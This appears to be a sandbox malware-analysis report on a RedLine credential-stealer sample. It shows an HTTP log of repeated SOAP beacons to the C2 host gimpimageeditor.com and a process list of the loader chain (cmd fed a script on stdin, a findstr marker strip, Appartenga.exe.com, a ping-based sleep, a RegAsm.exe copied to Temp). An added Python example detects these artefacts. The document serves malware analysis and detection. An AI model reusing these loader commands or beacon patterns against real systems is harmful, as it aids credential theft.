                                                                                                                        Jan 17, 2025 06:53:59.043087959 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:59.107963085 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:59.214375019 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:59.279678106 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:59.386310101 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:59.435997963 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:59.541879892 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:59.592120886 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:59.698050022 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:59.748395920 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:59.853921890 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:54:03.701206923 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:54:03.833153009 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:54:03.857547998 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:54:03.988148928 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:54:04.013950109 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:54:04.142520905 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:54:04.170206070 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:54:04.298993111 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:54:04.326333046 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:54:04.454514980 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:54:04.486108065 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:54:04.610255003 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
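The HTTP rows above show the stealer looping on the same 216-byte SOAP POST (SOAPAction http://tempuri.org/Endpoint/GetArguments, Host gimpimageeditor.com) every 130 to 180 ms and getting only 405 Method Not Allowed back, and the process list that follows shows the loader chain that got it running: cmd fed a script on stdin, findstr /V /R stripping a marker line out of a dropped file, a double-extension Appartenga.exe.com, ping 127.0.0.1 -n 30 as a sleep (Target ID 7 starts at 00:52:00, RegAsm.exe at 00:52:33), and a RegAsm.exe copied into a Temp directory and launched with no arguments. The script below is an added example, not part of the Joe Sandbox report or of any vendor tool. It parses constructed copies of both artefacts in the report's own row and command-line formats and applies detection rules to them; the rule names, the thresholds, and the assumption that the fused column is "timestamp, bytes transferred, direction" are this example's own choices.

```python
"""Added example; not part of the Joe Sandbox report or of any vendor tool.
Two small detectors run over constructed copies of artefacts shown on this page:
the HTTP stream rows (the RedLine-style WCF SOAP beacon to gimpimageeditor.com)
and the process command lines (the sacrificial-process loader chain). Rule
names, thresholds and the assumed row layout are this example's own choices."""
import re
from collections import Counter
from datetime import datetime
from statistics import median

# Constructed sample in the report's row layout: timestamp, byte count and
# direction are fused ("CET54IN..."); header lines follow without a prefix.
# Abbreviated to three request/response pairs with the headers that matter.
SAMPLE_HTTP = """\
Jan 17, 2025 06:54:03.388744116 CET216OUTPOST / HTTP/1.1
SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
Host: gimpimageeditor.com
Jan 17, 2025 06:54:03.510231018 CET54INHTTP/1.1 405 Method Not Allowed
content-length: 0
Jan 17, 2025 06:54:03.569631100 CET216OUTPOST / HTTP/1.1
SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
Host: gimpimageeditor.com
Jan 17, 2025 06:54:03.675441980 CET54INHTTP/1.1 405 Method Not Allowed
content-length: 0
Jan 17, 2025 06:54:03.701206923 CET216OUTPOST / HTTP/1.1
SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
Host: gimpimageeditor.com
Jan 17, 2025 06:54:03.833153009 CET54INHTTP/1.1 405 Method Not Allowed
content-length: 0
"""
ROW = re.compile(r"^(?P<ts>\w{3} \d{1,2}, \d{4} \d{2}:\d{2}:\d{2}\.\d{6})\d{3} CET"
                 r"(?P<size>\d+)(?P<dir>IN|OUT)(?P<first>.*)$")
WCF_ACTION = "http://tempuri.org/Endpoint/GetArguments"

def parse_rows(text):
    """Group rows into messages: {ts, size, dir, lines}; %f keeps 6 digits."""
    msgs = []
    for line in (l.strip() for l in text.splitlines() if l.strip()):
        m = ROW.match(line)
        if m:
            msgs.append({"ts": datetime.strptime(m["ts"], "%b %d, %Y %H:%M:%S.%f"),
                         "size": int(m["size"]), "dir": m["dir"], "lines": [m["first"]]})
        elif msgs:                      # unprefixed line: header of current message
            msgs[-1]["lines"].append(line)
    return msgs

def header(msg, name):
    for line in msg["lines"][1:]:
        key, _, value = line.partition(":")
        if key.strip().lower() == name.lower():
            return value.strip()
    return None

def beacon_summary(msgs, min_posts=3):
    """Flag repeated identical WCF SOAP POSTs and report whether the C2 answered."""
    posts = [m for m in msgs if m["dir"] == "OUT" and m["lines"][0].startswith("POST ")
             and (header(m, "SOAPAction") or "").strip('"') == WCF_ACTION]
    codes = Counter(m["lines"][0].split()[1] for m in msgs
                    if m["dir"] == "IN" and m["lines"][0].startswith("HTTP/"))
    gaps = [(b["ts"] - a["ts"]).total_seconds() for a, b in zip(posts, posts[1:])]
    return {"posts": len(posts), "hosts": sorted({header(m, "Host") for m in posts}),
            "status": dict(codes), "median_gap_s": round(median(gaps), 3) if gaps else None,
            "redline_wcf_beacon": len(posts) >= min_posts,   # same action, same host
            "c2_responding": codes.get("200", 0) > 0}         # only 405s: dead endpoint

# Constructed from the process list on this page (Target IDs 2, 5, 6, 7, 10).
SAMPLE_PROCS = [
    (2, r"C:\Windows\SysWOW64\cmd.exe", r'"C:\Windows\System32\cmd.exe" /c cmd < Ideale.adt'),
    (5, r"C:\Windows\SysWOW64\findstr.exe", 'findstr /V /R "^DzqZaKuCSEcQYFcSDUTCtNHXVpartBbUtTqjUWbpOSHHtRSBbGNtGZbQLrtosenduBMyFpYHvKOjuZSrsQGbOagtclAQSgSLxsADyMWgIuHVkkJLlqRAcq$" San.adt'),
    (6, r"C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.com", "Appartenga.exe.com S"),
    (7, r"C:\Windows\SysWOW64\PING.EXE", "ping 127.0.0.1 -n 30"),
    (10, r"C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe",
     r"C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe"),
]
RULES = {  # rule name -> pattern over the command line
    "cmd_script_via_stdin": re.compile(r'\bcmd(\.exe)?"?\s+/c\s+cmd\s*<\s*\S+', re.I),
    "findstr_strips_marker": re.compile(r'\bfindstr\s+/V\s+/R\s+"\^[A-Za-z0-9]{32,}\$"', re.I),
    "ping_loopback_sleep": re.compile(r"\bping\s+127\.0\.0\.1\s+-n\s+(\d+)", re.I),
    "double_extension_exe_com": re.compile(r"\.exe\.com\b", re.I),
}
DOTNET_DIR = r"c:\windows\microsoft.net\framework"

def score_process_chain(procs, min_rules=3):
    """Return rule hits per process id, the ping-derived sleep, and a verdict."""
    hits, sleep_s = {}, 0
    for pid, path, cmd in procs:
        for name, rx in RULES.items():
            m = rx.search(cmd)
            if m:
                hits.setdefault(name, []).append(pid)
            if m and name == "ping_loopback_sleep":    # one echo per second
                sleep_s = max(sleep_s, int(m.group(1)) - 1)
        low = path.lower()
        if low.endswith(r"\regasm.exe"):
            if not low.startswith(DOTNET_DIR):          # copied out of its home
                hits.setdefault("regasm_outside_dotnet_dir", []).append(pid)
            if not cmd.replace(path, "", 1).strip(' "'):  # no assembly to register
                hits.setdefault("regasm_no_arguments", []).append(pid)
    return {"hits": hits, "sleep_s": sleep_s, "loader_chain": len(hits) >= min_rules}
```

On the constructed sample, beacon_summary() reports three POSTs to a single host, status {"405": 3}, a median gap of about 0.16 s, and c2_responding False; score_process_chain() hits all six rules and derives a 29-second sleep from ping -n 30, which is the order of the gap between the ping and RegAsm.exe start times in the process list. The regex rules are deliberately narrow to the arguments shown on this page; a production rule set would widen them (other loopback targets for ping, quoted and unquoted findstr markers) and pair the RegAsm rules with the parent being a non-.NET binary in a user-writable directory.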
                                                                                                                        Target ID:0
                                                                                                                        Start time:00:51:59
                                                                                                                        Start date:17/01/2025
                                                                                                                        Path:C:\Users\user\Desktop\2YLM6BQ9S3.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:"C:\Users\user\Desktop\2YLM6BQ9S3.exe"
                                                                                                                        Imagebase:0x400000
                                                                                                                        File size:1'721'467 bytes
                                                                                                                        MD5 hash:7C86D24BF10F9A6970B3C7C86E455423
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:low
                                                                                                                        Has exited:true

                                                                                                                        Target ID:2
                                                                                                                        Start time:00:51:59
                                                                                                                        Start date:17/01/2025
                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:"C:\Windows\System32\cmd.exe" /c cmd < Ideale.adt
                                                                                                                        Imagebase:0x790000
                                                                                                                        File size:236'544 bytes
                                                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:high
                                                                                                                        Has exited:true

                                                                                                                        Target ID:3
                                                                                                                        Start time:00:51:59
                                                                                                                        Start date:17/01/2025
                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                        Wow64 process (32bit):false
                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                        File size:862'208 bytes
                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:high
                                                                                                                        Has exited:true

                                                                                                                        Target ID:4
                                                                                                                        Start time:00:51:59
                                                                                                                        Start date:17/01/2025
                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:cmd
                                                                                                                        Imagebase:0x790000
                                                                                                                        File size:236'544 bytes
                                                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:high
                                                                                                                        Has exited:true

                                                                                                                        Target ID:5
                                                                                                                        Start time:00:51:59
                                                                                                                        Start date:17/01/2025
                                                                                                                        Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:findstr /V /R "^DzqZaKuCSEcQYFcSDUTCtNHXVpartBbUtTqjUWbpOSHHtRSBbGNtGZbQLrtosenduBMyFpYHvKOjuZSrsQGbOagtclAQSgSLxsADyMWgIuHVkkJLlqRAcq$" San.adt
                                                                                                                        Imagebase:0x400000
                                                                                                                        File size:29'696 bytes
                                                                                                                        MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:high
                                                                                                                        Has exited:true

                                                                                                                        Target ID:6
                                                                                                                        Start time:00:52:00
                                                                                                                        Start date:17/01/2025
                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.com
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:Appartenga.exe.com S
                                                                                                                        Imagebase:0xbd0000
                                                                                                                        File size:893'608 bytes
                                                                                                                        MD5 hash:C56B5F0201A3B3DE53E561FE76912BFD
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Antivirus matches:
                                                                                                                        • Detection: 3%, ReversingLabs
                                                                                                                        Reputation:high
                                                                                                                        Has exited:true

                                                                                                                        Target ID:7
                                                                                                                        Start time:00:52:00
                                                                                                                        Start date:17/01/2025
                                                                                                                        Path:C:\Windows\SysWOW64\PING.EXE
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:ping 127.0.0.1 -n 30
                                                                                                                        Imagebase:0x5c0000
                                                                                                                        File size:18'944 bytes
                                                                                                                        MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:high
                                                                                                                        Has exited:true

                                                                                                                        Target ID:8
                                                                                                                        Start time:00:52:00
                                                                                                                        Start date:17/01/2025
                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.com
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.com S
                                                                                                                        Imagebase:0xbd0000
                                                                                                                        File size:893'608 bytes
                                                                                                                        MD5 hash:C56B5F0201A3B3DE53E561FE76912BFD
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000003.2416702324.0000000004270000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000008.00000003.2416702324.0000000004270000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000008.00000003.2416702324.0000000004270000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000003.2416510375.00000000042BA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000008.00000003.2416510375.00000000042BA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000008.00000003.2416510375.00000000042BA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000003.2416510375.00000000042D6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000008.00000003.2416510375.00000000042D6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000008.00000003.2416510375.00000000042D6000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000003.2416670855.000000000424C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000008.00000003.2416670855.000000000424C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000008.00000003.2416670855.000000000424C000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000003.2416510375.0000000004286000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000008.00000003.2416510375.0000000004286000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000008.00000003.2416510375.0000000004286000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
Reputation: high
Has exited: true

Target ID: 10
Start time: 00:52:33
Start date: 17/01/2025
Path: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe
Imagebase: 0x340000
File size: 65'440 bytes
MD5 hash: 0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.3266529061.0000000000722000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000A.00000002.3266529061.0000000000722000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 0000000A.00000002.3266529061.0000000000722000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
Antivirus matches:
• Detection: 0%, ReversingLabs
Reputation: high
Has exited: false
